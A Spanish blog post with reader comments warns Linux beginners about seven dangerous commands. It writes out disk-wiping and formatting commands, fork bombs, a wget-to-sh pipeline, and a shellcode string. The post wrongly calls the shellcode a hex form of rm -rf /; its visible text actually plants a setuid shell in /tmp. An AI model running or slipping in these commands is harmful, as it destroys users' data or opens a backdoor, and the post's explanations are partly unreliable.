7 peligrosos comandos de Linux

Consola de Linux

Este post, extraído de Tech Source from Bohol, nos advierte sobre 7 peligrosos comandos de Linux que pueden hacer estragos en nuestro ordenador.

Aunque el post está pensado para usuarios que se acercan por primera vez al mundo Linux no está de más refrescar la memoria a los que sabemos un poco más. Estos son los 7 peligrosos comandos de Linux:

  1. rm -rf /
    Este comando eliminará todos los archivos y directorios de nuestro directorio root sin pedir confirmación
  2. char esp[] __attribute__ ((section(".text"))) /* e.s.p
    release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;";

    Es la versión hexadecimal de rm -rf / que puede despistar y hacer estragos incluso a los usuarios avanzados
  3. mkfs.ext3 /dev/sda
    Con este comando se formateará de nuevo la unidad que incluyamos después de mkfs
  4. :(){:|:&};:
    Este comando ejecutará un gran número de procesos hasta que el sistema deje de funcionar lo que puede provocar también que los datos de nuestro equipo se corrompan. También se le conoce como bomba fork o forkbomb, en inglés.
  5. cualquier_comando > /dev/sda
    Con esta acción se empiezan a escribir datos en nuestra unidad de disco duro que originará una peŕdida de datos.
  6. wget http://cualquier_fuente_no_fiable -O- | sh
    Este comando puede hacer que estemos ejecutando código malicioso en nuestro equipo, así que la solución pasa por no descargar nunca archivos de fuentes no fiables y mucho menos ejecutarlos.
  7. mv /home/tudirectoriohome/* /dev/null
    El comando mv enviará todos los archivos de tu directorio home a un lugar que no existe, con lo que ya no podrás recuperar esos datos.

Por supuesto, si al leer este post queréis compartir algún comando más que consideréis peligros estaré encantando de añadirlo :)

5 thoughts on “7 peligrosos comandos de Linux”

  1. El que rm -rf/ lo borre todo / es un poco sensacionalista,existen opciones x defecto para que esto no ocurra (–preserve-option).Por otro lado las bombas forks no son tan peligrosas,otro ejemplo de bombas forks podrìa ser [$0 & $0 &] Aqui tienes mas info sobre estas bombitas que muchos usamos para jugar una mala pasada http://phyx.wordpress.com/2008/08/21/bombas-fork-en-linux-comandos-peligrosos-2/ .Claro que quisiera compartir varios comandos peligros aqui pero serìan muchos,estos son los mas conocidos,creo que los mas peligrosos son los que no se conocen,de todas maneras comparto uno simple: En perl -> (fork while fork).Por aqui tienes otros http://phyx.wordpress.com/2008/07/14/comandos-peligrosos-mirar-pero-no-los-ejecutar/ .Salu2.

  2. Gracias Nico. Apuntados quedan.
    En cuanto a lo del sensacionalismo, recuerda que como comentaba en la anotación el público objetivo de este post es todo aquel usuario que decide adentrarse en el fascinante mundo del software libre y no dispone del conocimiento suficiente. Si conseguimos que este tipo de anotaciones conlleven una experiencia positiva, eso que habremos ganado, ¿no te parece?

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>